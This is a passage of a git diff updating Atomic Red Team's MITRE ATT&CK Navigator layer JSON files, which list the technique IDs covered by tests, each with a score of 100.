test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index dc96ba52..323bade4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled"